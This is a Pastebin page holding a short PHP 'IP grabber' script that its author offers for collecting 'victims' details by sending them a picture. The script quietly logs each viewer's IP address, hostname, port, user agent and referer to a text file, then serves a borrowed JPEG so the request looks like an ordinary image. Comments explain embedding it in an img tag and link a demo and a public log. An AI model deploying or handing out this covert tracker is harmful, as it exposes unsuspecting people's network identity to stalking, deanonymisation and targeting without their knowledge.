Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- #############################################
- #Save Ip + All Victims Details By sending him a Picture :)
- #You can also add it in your website by <img src="http://openfbdns.webuda.com/etc.php">
- #Coded By H4T3D
- #Demo : http://openfbdns.webuda.com/etc.php
- #Ips : http://openfbdns.webuda.com/log.txt
- ##############################################
- //IP Grabber
- //Variables
- $protocol = $_SERVER['SERVER_PROTOCOL'];
- $ip = $_SERVER['REMOTE_ADDR'];
- $port = $_SERVER['REMOTE_PORT'];
- $agent = $_SERVER['HTTP_USER_AGENT'];
- $ref = $_SERVER['HTTP_REFERER'];
- $hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
- //Print IP, Hostname, Port Number, User Agent and Referer To Log.TXT
- $fh = fopen('log.txt', 'a');
- fwrite($fh, 'IP Address: '."".$ip ."\n");
- fwrite($fh, 'Hostname: '."".$hostname ."\n");
- fwrite($fh, 'Port Number: '."".$port ."\n");
- fwrite($fh, 'User Agent: '."".$agent ."\n");
- fwrite($fh, 'HTTP Referer: '."".$ref ."\n\n");
- fclose($fh);
- //Change Image >>https://www.wordans.co.nz/wvc-1334345743/wordansfiles/images/2012/4/13/137566/137566_340.jpg
- $im = imagecreatefromjpeg('https://www.wordans.co.nz/wvc-1334345743/wordansfiles/images/2012/4/13/137566/137566_340.jpg');
- header('Content-type: image/jpg');
- imagepng($im);
- imagedestroy($im);
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement